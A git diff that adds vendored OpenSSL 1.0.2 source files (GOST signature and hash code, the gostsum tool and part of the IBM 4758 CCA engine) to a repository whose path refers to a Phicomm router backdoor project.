+    BN_mod_exp(v, md, q2, dsa->q, ctx);
+    BN_mod_mul(z1, sig->s, v, dsa->q, ctx);
+    BN_sub(tmp, dsa->q, sig->r);
+    BN_mod_mul(z2, tmp, v, dsa->p, ctx);
+    BN_mod_exp(tmp, dsa->g, z1, dsa->p, ctx);
+    BN_mod_exp(tmp2, dsa->pub_key, z2, dsa->p, ctx);
+    BN_mod_mul(tmp3, tmp, tmp2, dsa->p, ctx);
+    BN_mod(u, tmp3, dsa->q, ctx);
+    ok = BN_cmp(u, sig->r);
+
+    BN_free(md);
+    BN_CTX_end(ctx);
+    BN_CTX_free(ctx);
+    if (ok != 0) {
+        GOSTerr(GOST_F_GOST_DO_VERIFY, GOST_R_SIGNATURE_MISMATCH);
+    }
+    return (ok == 0);
+}
+
+/*
+ * Computes public keys for GOST R 34.10-94 algorithm
+ *
+ */
+int gost94_compute_public(DSA *dsa)
+{
+    /* Now fill algorithm parameters with correct values */
+    BN_CTX *ctx = BN_CTX_new();
+    if (!dsa->g) {
+        GOSTerr(GOST_F_GOST94_COMPUTE_PUBLIC, GOST_R_KEY_IS_NOT_INITALIZED);
+        return 0;
+    }
+    /* Compute public key  y = a^x mod p */
+    dsa->pub_key = BN_new();
+    BN_mod_exp(dsa->pub_key, dsa->g, dsa->priv_key, dsa->p, ctx);
+    BN_CTX_free(ctx);
+    return 1;
+}
+
+/*
+ * Fill GOST 94 params, searching them in R3410_paramset array
+ * by nid of paramset
+ *
+ */
+int fill_GOST94_params(DSA *dsa, int nid)
+{
+    R3410_params *params = R3410_paramset;
+    while (params->nid != NID_undef && params->nid != nid)
+        params++;
+    if (params->nid == NID_undef) {
+        GOSTerr(GOST_F_FILL_GOST94_PARAMS, GOST_R_UNSUPPORTED_PARAMETER_SET);
+        return 0;
+    }
+#define dump_signature(a,b,c)
+    if (dsa->p) {
+        BN_free(dsa->p);
+    }
+    dsa->p = NULL;
+    BN_dec2bn(&(dsa->p), params->p);
+    if (dsa->q) {
+        BN_free(dsa->q);
+    }
+    dsa->q = NULL;
+    BN_dec2bn(&(dsa->q), params->q);
+    if (dsa->g) {
+        BN_free(dsa->g);
+    }
+    dsa->g = NULL;
+    BN_dec2bn(&(dsa->g), params->a);
+    return 1;
+}
+
+/*
+ *  Generate GOST R 34.10-94 keypair
+ *
+ *
+ */
+int gost_sign_keygen(DSA *dsa)
+{
+    dsa->priv_key = BN_new();
+    BN_rand_range(dsa->priv_key, dsa->q);
+    return gost94_compute_public(dsa);
+}
+
+/* Unpack signature according to cryptocom rules  */
+/*-
+DSA_SIG *unpack_cc_signature(const unsigned char *sig,size_t siglen)
+        {
+        DSA_SIG *s;
+        s = DSA_SIG_new();
+        if (s == NULL)
+                {
+                GOSTerr(GOST_F_UNPACK_CC_SIGNATURE,GOST_R_NO_MEMORY);
+                return(NULL);
+                }
+        s->r = getbnfrombuf(sig, siglen/2);
+        s->s = getbnfrombuf(sig + siglen/2, siglen/2);
+        return s;
+        }
+*/
+/* Unpack signature according to cryptopro rules  */
+DSA_SIG *unpack_cp_signature(const unsigned char *sig, size_t siglen)
+{
+    DSA_SIG *s;
+
+    s = DSA_SIG_new();
+    if (s == NULL) {
+        GOSTerr(GOST_F_UNPACK_CP_SIGNATURE, GOST_R_NO_MEMORY);
+        return NULL;
+    }
+    s->s = getbnfrombuf(sig, siglen / 2);
+    s->r = getbnfrombuf(sig + siglen / 2, siglen / 2);
+    return s;
+}
+
+/* Convert little-endian byte array into bignum */
+BIGNUM *hashsum2bn(const unsigned char *dgst)
+{
+    unsigned char buf[32];
+    int i;
+    for (i = 0; i < 32; i++) {
+        buf[31 - i] = dgst[i];
+    }
+    return getbnfrombuf(buf, 32);
+}
+
+/* Convert byte buffer to bignum, skipping leading zeros*/
+BIGNUM *getbnfrombuf(const unsigned char *buf, size_t len)
+{
+    while (*buf == 0 && len > 0) {
+        buf++;
+        len--;
+    }
+    if (len) {
+        return BN_bin2bn(buf, len, NULL);
+    } else {
+        BIGNUM *b = BN_new();
+        BN_zero(b);
+        return b;
+    }
+}
+
+/*
+ * Pack bignum into byte buffer of given size, filling all leading bytes by
+ * zeros
+ */
+int store_bignum(BIGNUM *bn, unsigned char *buf, int len)
+{
+    int bytes = BN_num_bytes(bn);
+    if (bytes > len)
+        return 0;
+    memset(buf, 0, len);
+    BN_bn2bin(bn, buf + len - bytes);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gosthash.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gosthash.c
new file mode 100644
index 0000000..72faa24
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gosthash.c
@@ -0,0 +1,268 @@
+/**********************************************************************
+ *                          gosthash.c                                *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *    Implementation of GOST R 34.11-94 hash function                 *
+ *       uses on gost89.c and gost89.h Doesn't need OpenSSL           *
+ **********************************************************************/
+#include <string.h>
+
+#include "gost89.h"
+#include "gosthash.h"
+
+/*
+ * Use OPENSSL_malloc for memory allocation if compiled with
+ * -DOPENSSL_BUILD, and libc malloc otherwise
+ */
+#ifndef MYALLOC
+# ifdef OPENSSL_BUILD
+#  include <openssl/crypto.h>
+#  define MYALLOC(size) OPENSSL_malloc(size)
+#  define MYFREE(ptr) OPENSSL_free(ptr)
+# else
+#  define MYALLOC(size) malloc(size)
+#  define MYFREE(ptr) free(ptr)
+# endif
+#endif
+/*
+ * Following functions are various bit meshing routines used in GOST R
+ * 34.11-94 algorithms
+ */
+static void swap_bytes(byte * w, byte * k)
+{
+    int i, j;
+    for (i = 0; i < 4; i++)
+        for (j = 0; j < 8; j++)
+            k[i + 4 * j] = w[8 * i + j];
+
+}
+
+/* was A_A */
+static void circle_xor8(const byte * w, byte * k)
+{
+    byte buf[8];
+    int i;
+    memcpy(buf, w, 8);
+    memmove(k, w + 8, 24);
+    for (i = 0; i < 8; i++)
+        k[i + 24] = buf[i] ^ k[i];
+}
+
+/* was R_R */
+static void transform_3(byte * data)
+{
+    unsigned short int acc;
+    acc = (data[0] ^ data[2] ^ data[4] ^ data[6] ^ data[24] ^ data[30]) |
+        ((data[1] ^ data[3] ^ data[5] ^ data[7] ^ data[25] ^ data[31]) << 8);
+    memmove(data, data + 2, 30);
+    data[30] = acc & 0xff;
+    data[31] = acc >> 8;
+}
+
+/* Adds blocks of N bytes modulo 2**(8*n). Returns carry*/
+static int add_blocks(int n, byte * left, const byte * right)
+{
+    int i;
+    int carry = 0;
+    int sum;
+    for (i = 0; i < n; i++) {
+        sum = (int)left[i] + (int)right[i] + carry;
+        left[i] = sum & 0xff;
+        carry = sum >> 8;
+    }
+    return carry;
+}
+
+/* Xor two sequences of bytes */
+static void xor_blocks(byte * result, const byte * a, const byte * b,
+                       size_t len)
+{
+    size_t i;
+    for (i = 0; i < len; i++)
+        result[i] = a[i] ^ b[i];
+}
+
+/*
+ *      Calculate H(i+1) = Hash(Hi,Mi)
+ *      Where H and M are 32 bytes long
+ */
+static int hash_step(gost_ctx * c, byte * H, const byte * M)
+{
+    byte U[32], W[32], V[32], S[32], Key[32];
+    int i;
+    /* Compute first key */
+    xor_blocks(W, H, M, 32);
+    swap_bytes(W, Key);
+    /* Encrypt first 8 bytes of H with first key */
+    gost_enc_with_key(c, Key, H, S);
+    /* Compute second key */
+    circle_xor8(H, U);
+    circle_xor8(M, V);
+    circle_xor8(V, V);
+    xor_blocks(W, U, V, 32);
+    swap_bytes(W, Key);
+    /* encrypt second 8 bytes of H with second key */
+    gost_enc_with_key(c, Key, H + 8, S + 8);
+    /* compute third key */
+    circle_xor8(U, U);
+    U[31] = ~U[31];
+    U[29] = ~U[29];
+    U[28] = ~U[28];
+    U[24] = ~U[24];
+    U[23] = ~U[23];
+    U[20] = ~U[20];
+    U[18] = ~U[18];
+    U[17] = ~U[17];
+    U[14] = ~U[14];
+    U[12] = ~U[12];
+    U[10] = ~U[10];
+    U[8] = ~U[8];
+    U[7] = ~U[7];
+    U[5] = ~U[5];
+    U[3] = ~U[3];
+    U[1] = ~U[1];
+    circle_xor8(V, V);
+    circle_xor8(V, V);
+    xor_blocks(W, U, V, 32);
+    swap_bytes(W, Key);
+    /* encrypt third 8 bytes of H with third key */
+    gost_enc_with_key(c, Key, H + 16, S + 16);
+    /* Compute fourth key */
+    circle_xor8(U, U);
+    circle_xor8(V, V);
+    circle_xor8(V, V);
+    xor_blocks(W, U, V, 32);
+    swap_bytes(W, Key);
+    /* Encrypt last 8 bytes with fourth key */
+    gost_enc_with_key(c, Key, H + 24, S + 24);
+    for (i = 0; i < 12; i++)
+        transform_3(S);
+    xor_blocks(S, S, M, 32);
+    transform_3(S);
+    xor_blocks(S, S, H, 32);
+    for (i = 0; i < 61; i++)
+        transform_3(S);
+    memcpy(H, S, 32);
+    return 1;
+}
+
+/*
+ * Initialize gost_hash ctx - cleans up temporary structures and set up
+ * substitution blocks
+ */
+int init_gost_hash_ctx(gost_hash_ctx * ctx,
+                       const gost_subst_block * subst_block)
+{
+    memset(ctx, 0, sizeof(gost_hash_ctx));
+    ctx->cipher_ctx = (gost_ctx *) MYALLOC(sizeof(gost_ctx));
+    if (!ctx->cipher_ctx) {
+        return 0;
+    }
+    gost_init(ctx->cipher_ctx, subst_block);
+    return 1;
+}
+
+/*
+ * Free cipher CTX if it is dynamically allocated. Do not use
+ * if cipher ctx is statically allocated as in OpenSSL implementation of
+ * GOST hash algroritm
+ *
+ */
+void done_gost_hash_ctx(gost_hash_ctx * ctx)
+{
+    /*
+     * No need to use gost_destroy, because cipher keys are not really secret
+     * when hashing
+     */
+    MYFREE(ctx->cipher_ctx);
+}
+
+/*
+ * reset state of hash context to begin hashing new message
+ */
+int start_hash(gost_hash_ctx * ctx)
+{
+    if (!ctx->cipher_ctx)
+        return 0;
+    memset(&(ctx->H), 0, 32);
+    memset(&(ctx->S), 0, 32);
+    ctx->len = 0L;
+    ctx->left = 0;
+    return 1;
+}
+
+/*
+ * Hash block of arbitrary length
+ *
+ *
+ */
+int hash_block(gost_hash_ctx * ctx, const byte * block, size_t length)
+{
+    if (ctx->left) {
+        /*
+         * There are some bytes from previous step
+         */
+        unsigned int add_bytes = 32 - ctx->left;
+        if (add_bytes > length) {
+            add_bytes = length;
+        }
+        memcpy(&(ctx->remainder[ctx->left]), block, add_bytes);
+        ctx->left += add_bytes;
+        if (ctx->left < 32) {
+            return 1;
+        }
+        block += add_bytes;
+        length -= add_bytes;
+        hash_step(ctx->cipher_ctx, ctx->H, ctx->remainder);
+        add_blocks(32, ctx->S, ctx->remainder);
+        ctx->len += 32;
+        ctx->left = 0;
+    }
+    while (length >= 32) {
+        hash_step(ctx->cipher_ctx, ctx->H, block);
+
+        add_blocks(32, ctx->S, block);
+        ctx->len += 32;
+        block += 32;
+        length -= 32;
+    }
+    if (length) {
+        memcpy(ctx->remainder, block, ctx->left = length);
+    }
+    return 1;
+}
+
+/*
+ * Compute hash value from current state of ctx
+ * state of hash ctx becomes invalid and cannot be used for further
+ * hashing.
+ */
+int finish_hash(gost_hash_ctx * ctx, byte * hashval)
+{
+    byte buf[32];
+    byte H[32];
+    byte S[32];
+    ghosthash_len fin_len = ctx->len;
+    byte *bptr;
+    memcpy(H, ctx->H, 32);
+    memcpy(S, ctx->S, 32);
+    if (ctx->left) {
+        memset(buf, 0, 32);
+        memcpy(buf, ctx->remainder, ctx->left);
+        hash_step(ctx->cipher_ctx, H, buf);
+        add_blocks(32, S, buf);
+        fin_len += ctx->left;
+    }
+    memset(buf, 0, 32);
+    bptr = buf;
+    fin_len <<= 3;              /* Hash length in BITS!! */
+    while (fin_len > 0) {
+        *(bptr++) = (byte) (fin_len & 0xFF);
+        fin_len >>= 8;
+    };
+    hash_step(ctx->cipher_ctx, H, buf);
+    hash_step(ctx->cipher_ctx, H, S);
+    memcpy(hashval, H, 32);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gosthash.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gosthash.h
new file mode 100644
index 0000000..003e668
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gosthash.h
@@ -0,0 +1,52 @@
+/**********************************************************************
+ *                          gosthash.h                                *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *       This file is distributed under the same license as OpenSSL   *
+ *                                                                    *
+ *    Declaration of GOST R 34.11-94 hash functions                   *
+ *       uses  and gost89.h Doesn't need OpenSSL                      *
+ **********************************************************************/
+#ifndef GOSTHASH_H
+# define GOSTHASH_H
+# include "gost89.h"
+# include <stdlib.h>
+
+# if (defined(_WIN32) || defined(_WIN64)) && !defined(__MINGW32__)
+typedef __int64 ghosthash_len;
+# elif defined(__arch64__)
+typedef long ghosthash_len;
+# else
+typedef long long ghosthash_len;
+# endif
+
+typedef struct gost_hash_ctx {
+    ghosthash_len len;
+    gost_ctx *cipher_ctx;
+    int left;
+    byte H[32];
+    byte S[32];
+    byte remainder[32];
+} gost_hash_ctx;
+
+/* Initalizes gost hash ctx, including creation of gost cipher ctx */
+
+int init_gost_hash_ctx(gost_hash_ctx * ctx,
+                       const gost_subst_block * subst_block);
+void done_gost_hash_ctx(gost_hash_ctx * ctx);
+
+/*
+ * Cleans up all fields, except cipher ctx preparing ctx for computing of new
+ * hash value
+ */
+int start_hash(gost_hash_ctx * ctx);
+
+/* Hashes block of data */
+int hash_block(gost_hash_ctx * ctx, const byte * block, size_t length);
+
+/*
+ * Finalizes computation of hash and fills buffer (which should be at least
+ * 32 bytes long) with value of computed hash.
+ */
+int finish_hash(gost_hash_ctx * ctx, byte * hashval);
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gostsum.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gostsum.c
new file mode 100644
index 0000000..1021848
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gostsum.c
@@ -0,0 +1,187 @@
+/**********************************************************************
+ *                        gostsum.c                                   *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *        Almost drop-in replacement for md5sum and sha1sum           *
+ *          which computes GOST R 34.11-94 hashsum instead            *
+ *                                                                    *
+ **********************************************************************/
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <limits.h>
+#include <fcntl.h>
+#include <string.h>
+#include "gosthash.h"
+#define BUF_SIZE 262144
+int hash_file(gost_hash_ctx * ctx, char *filename, char *sum, int mode);
+int hash_stream(gost_hash_ctx * ctx, int fd, char *sum);
+int get_line(FILE *f, char *hash, char *filename);
+void help()
+{
+    fprintf(stderr, "gostsum [-bvt] [-c [file]]| [files]\n"
+            "\t-c check message digests (default is generate)\n"
+            "\t-v verbose, print file names when checking\n"
+            "\t-b read files in binary mode\n"
+            "\t-t use test GOST paramset (default is CryptoPro paramset)\n"
+            "The input for -c should be the list of message digests and file names\n"
+            "that is printed on stdout by this program when it generates digests.\n");
+    exit(3);
+}
+
+#ifndef O_BINARY
+# define O_BINARY 0
+#endif
+
+int main(int argc, char **argv)
+{
+    int c, i;
+    int verbose = 0;
+    int errors = 0;
+    int open_mode = O_RDONLY;
+    gost_subst_block *b = &GostR3411_94_CryptoProParamSet;
+    FILE *check_file = NULL;
+    gost_hash_ctx ctx;
+
+    while ((c = getopt(argc, argv, "bc::tv")) != -1) {
+        switch (c) {
+        case 'v':
+            verbose = 1;
+            break;
+        case 't':
+            b = &GostR3411_94_TestParamSet;
+            break;
+        case 'b':
+            open_mode |= O_BINARY;
+            break;
+        case 'c':
+            if (optarg) {
+                check_file = fopen(optarg, "r");
+                if (!check_file) {
+                    perror(optarg);
+                    exit(2);
+                }
+            } else {
+                check_file = stdin;
+            }
+            break;
+        default:
+            fprintf(stderr, "invalid option %c", optopt);
+            help();
+        }
+    }
+    init_gost_hash_ctx(&ctx, b);
+    if (check_file) {
+        char inhash[65], calcsum[65], filename[PATH_MAX];
+        int failcount = 0, count = 0;;
+        if (check_file == stdin && optind < argc) {
+            check_file = fopen(argv[optind], "r");
+            if (!check_file) {
+                perror(argv[optind]);
+                exit(2);
+            }
+        }
+        while (get_line(check_file, inhash, filename)) {
+            if (!hash_file(&ctx, filename, calcsum, open_mode)) {
+                exit(2);
+            }
+            count++;
+            if (!strncmp(calcsum, inhash, 65)) {
+                if (verbose) {
+                    fprintf(stderr, "%s\tOK\n", filename);
+                }
+            } else {
+                if (verbose) {
+                    fprintf(stderr, "%s\tFAILED\n", filename);
+                } else {
+                    fprintf(stderr,
+                            "%s: GOST hash sum check failed for '%s'\n",
+                            argv[0], filename);
+                }
+                failcount++;
+            }
+        }
+        if (verbose && failcount) {
+            fprintf(stderr,
+                    "%s: %d of %d file(f) failed GOST hash sum check\n",
+                    argv[0], failcount, count);
+        }
+        exit(failcount ? 1 : 0);
+    }
+    if (optind == argc) {
+        char sum[65];
+        if (!hash_stream(&ctx, fileno(stdin), sum)) {
+            perror("stdin");
+            exit(1);
+        }
+        printf("%s -\n", sum);
+        exit(0);
+    }
+    for (i = optind; i < argc; i++) {
+        char sum[65];
+        if (!hash_file(&ctx, argv[i], sum, open_mode)) {
+            errors++;
+        } else {
+            printf("%s %s\n", sum, argv[i]);
+        }
+    }
+    exit(errors ? 1 : 0);
+}
+
+int hash_file(gost_hash_ctx * ctx, char *filename, char *sum, int mode)
+{
+    int fd;
+    if ((fd = open(filename, mode)) < 0) {
+        perror(filename);
+        return 0;
+    }
+    if (!hash_stream(ctx, fd, sum)) {
+        perror(filename);
+        return 0;
+    }
+    close(fd);
+    return 1;
+}
+
+int hash_stream(gost_hash_ctx * ctx, int fd, char *sum)
+{
+    unsigned char buffer[BUF_SIZE];
+    ssize_t bytes;
+    int i;
+    start_hash(ctx);
+    while ((bytes = read(fd, buffer, BUF_SIZE)) > 0) {
+        hash_block(ctx, buffer, bytes);
+    }
+    if (bytes < 0) {
+        return 0;
+    }
+    finish_hash(ctx, buffer);
+    for (i = 0; i < 32; i++) {
+        sprintf(sum + 2 * i, "%02x", buffer[31 - i]);
+    }
+    return 1;
+}
+
+int get_line(FILE *f, char *hash, char *filename)
+{
+    int i;
+    if (fread(hash, 1, 64, f) < 64)
+        return 0;
+    hash[64] = 0;
+    for (i = 0; i < 64; i++) {
+        if (hash[i] < '0' || (hash[i] > '9' && hash[i] < 'A')
+            || (hash[i] > 'F' && hash[i] < 'a') || hash[i] > 'f') {
+            fprintf(stderr, "Not a hash value '%s'\n", hash);
+            return 0;
+        }
+    }
+    if (fgetc(f) != ' ') {
+        fprintf(stderr, "Malformed input line\n");
+        return 0;
+    }
+    i = strlen(fgets(filename, PATH_MAX, f));
+    while (filename[--i] == '\n' || filename[i] == '\r')
+        filename[i] = 0;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca.c
new file mode 100644
index 0000000..5f77198
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_4758cca.c
@@ -0,0 +1,952 @@
+/* Author: Maurice Gittens <maurice@gittens.nl>                       */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/dso.h>
+#include <openssl/x509.h>
+#include <openssl/objects.h>
+#include <openssl/engine.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_4758_CCA
+
+#  ifdef FLAT_INC
+#   include "hw_4758_cca.h"
+#  else
+#   include "vendor_defns/hw_4758_cca.h"
+#  endif
+
+#  include "e_4758cca_err.c"
+
+static int ibm_4758_cca_destroy(ENGINE *e);
+static int ibm_4758_cca_init(ENGINE *e);
+static int ibm_4758_cca_finish(ENGINE *e);
+static int ibm_4758_cca_ctrl(ENGINE *e, int cmd, long i, void *p,
+                             void (*f) (void));
+
+/* rsa functions */
+/* -------------*/
+#  ifndef OPENSSL_NO_RSA
+static int cca_rsa_pub_enc(int flen, const unsigned char *from,
+                           unsigned char *to, RSA *rsa, int padding);
+static int cca_rsa_priv_dec(int flen, const unsigned char *from,
+                            unsigned char *to, RSA *rsa, int padding);
+static int cca_rsa_sign(int type, const unsigned char *m, unsigned int m_len,
+                        unsigned char *sigret, unsigned int *siglen,
+                        const RSA *rsa);
+static int cca_rsa_verify(int dtype, const unsigned char *m,
+                          unsigned int m_len, const unsigned char *sigbuf,
+                          unsigned int siglen, const RSA *rsa);
+
+/* utility functions */
+/* ---------------------*/
+static EVP_PKEY *ibm_4758_load_privkey(ENGINE *, const char *,
+                                       UI_METHOD *ui_method,
+                                       void *callback_data);
+static EVP_PKEY *ibm_4758_load_pubkey(ENGINE *, const char *,
+                                      UI_METHOD *ui_method,
+                                      void *callback_data);
+
+static int getModulusAndExponent(const unsigned char *token,
+                                 long *exponentLength,
+                                 unsigned char *exponent, long *modulusLength,
+                                 long *modulusFieldLength,
+                                 unsigned char *modulus);
+#  endif
+
+/* RAND number functions */
+/* ---------------------*/
+static int cca_get_random_bytes(unsigned char *, int);
+static int cca_random_status(void);
+
+#  ifndef OPENSSL_NO_RSA
+static void cca_ex_free(void *obj, void *item, CRYPTO_EX_DATA *ad,
+                        int idx, long argl, void *argp);
+#  endif
+
+/* Function pointers for CCA verbs */
+/* -------------------------------*/
+#  ifndef OPENSSL_NO_RSA
+static F_KEYRECORDREAD keyRecordRead;
+static F_DIGITALSIGNATUREGENERATE digitalSignatureGenerate;
+static F_DIGITALSIGNATUREVERIFY digitalSignatureVerify;
+static F_PUBLICKEYEXTRACT publicKeyExtract;
+static F_PKAENCRYPT pkaEncrypt;
+static F_PKADECRYPT pkaDecrypt;
+#  endif
+static F_RANDOMNUMBERGENERATE randomNumberGenerate;
+
+/* static variables */
+/* ----------------*/
+static const char *CCA4758_LIB_NAME = NULL;
+static const char *get_CCA4758_LIB_NAME(void)
+{
+    if (CCA4758_LIB_NAME)
+        return CCA4758_LIB_NAME;
+    return CCA_LIB_NAME;
+}
+
+static void free_CCA4758_LIB_NAME(void)
+{
+    if (CCA4758_LIB_NAME)
+        OPENSSL_free((void *)CCA4758_LIB_NAME);
+    CCA4758_LIB_NAME = NULL;
+}
+
+static long set_CCA4758_LIB_NAME(const char *name)
+{
+    free_CCA4758_LIB_NAME();
+    return (((CCA4758_LIB_NAME = BUF_strdup(name)) != NULL) ? 1 : 0);
+}
+
+#  ifndef OPENSSL_NO_RSA
+static const char *n_keyRecordRead = CSNDKRR;
+static const char *n_digitalSignatureGenerate = CSNDDSG;
+static const char *n_digitalSignatureVerify = CSNDDSV;
+static const char *n_publicKeyExtract = CSNDPKX;
+static const char *n_pkaEncrypt = CSNDPKE;
+static const char *n_pkaDecrypt = CSNDPKD;
+#  endif
+static const char *n_randomNumberGenerate = CSNBRNG;
+
+#  ifndef OPENSSL_NO_RSA
+static int hndidx = -1;
+#  endif
+static DSO *dso = NULL;
+
+/* openssl engine initialization structures */
+/* ----------------------------------------*/
+
+#  define CCA4758_CMD_SO_PATH             ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN cca4758_cmd_defns[] = {
+    {CCA4758_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the '4758cca' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+static RSA_METHOD ibm_4758_cca_rsa = {
+    "IBM 4758 CCA RSA method",
+    cca_rsa_pub_enc,
+    NULL,
+    NULL,
+    cca_rsa_priv_dec,
+    NULL,                       /* rsa_mod_exp, */
+    NULL,                       /* mod_exp_mont, */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    RSA_FLAG_SIGN_VER,          /* flags */
+    NULL,                       /* app_data */
+    cca_rsa_sign,               /* rsa_sign */
+    cca_rsa_verify,             /* rsa_verify */
+    NULL                        /* rsa_keygen */
+};
+#  endif
+
+static RAND_METHOD ibm_4758_cca_rand = {
+    /* "IBM 4758 RAND method", */
+    NULL,                       /* seed */
+    cca_get_random_bytes,       /* get random bytes from the card */
+    NULL,                       /* cleanup */
+    NULL,                       /* add */
+    cca_get_random_bytes,       /* pseudo rand */
+    cca_random_status,          /* status */
+};
+
+static const char *engine_4758_cca_id = "4758cca";
+static const char *engine_4758_cca_name =
+    "IBM 4758 CCA hardware engine support";
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+/* Compatibility hack, the dynamic library uses this form in the path */
+static const char *engine_4758_cca_id_alt = "4758_cca";
+#  endif
+
+/* engine implementation */
+/* ---------------------*/
+static int bind_helper(ENGINE *e)
+{
+    if (!ENGINE_set_id(e, engine_4758_cca_id) ||
+        !ENGINE_set_name(e, engine_4758_cca_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &ibm_4758_cca_rsa) ||
+#  endif
+        !ENGINE_set_RAND(e, &ibm_4758_cca_rand) ||
+        !ENGINE_set_destroy_function(e, ibm_4758_cca_destroy) ||
+        !ENGINE_set_init_function(e, ibm_4758_cca_init) ||
+        !ENGINE_set_finish_function(e, ibm_4758_cca_finish) ||
+        !ENGINE_set_ctrl_function(e, ibm_4758_cca_ctrl) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_load_privkey_function(e, ibm_4758_load_privkey) ||
+        !ENGINE_set_load_pubkey_function(e, ibm_4758_load_pubkey) ||
+#  endif
+        !ENGINE_set_cmd_defns(e, cca4758_cmd_defns))
+        return 0;
+    /* Ensure the error handling is set up */
+    ERR_load_CCA4758_strings();
+    return 1;
+}
+
+#  ifdef OPENSSL_NO_DYNAMIC_ENGINE
+static ENGINE *engine_4758_cca(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_4758cca(void)
+{
+    ENGINE *e_4758 = engine_4758_cca();
+    if (!e_4758)
+        return;
+    ENGINE_add(e_4758);
+    ENGINE_free(e_4758);
+    ERR_clear_error();
+}
+#  endif
+
+static int ibm_4758_cca_destroy(ENGINE *e)
+{
+    ERR_unload_CCA4758_strings();
+    free_CCA4758_LIB_NAME();
+    return 1;
+}
+
+static int ibm_4758_cca_init(ENGINE *e)
+{
+    if (dso) {
+        CCA4758err(CCA4758_F_IBM_4758_CCA_INIT, CCA4758_R_ALREADY_LOADED);
+        goto err;
+    }
+
+    dso = DSO_load(NULL, get_CCA4758_LIB_NAME(), NULL, 0);
+    if (!dso) {
+        CCA4758err(CCA4758_F_IBM_4758_CCA_INIT, CCA4758_R_DSO_FAILURE);
+        goto err;
+    }
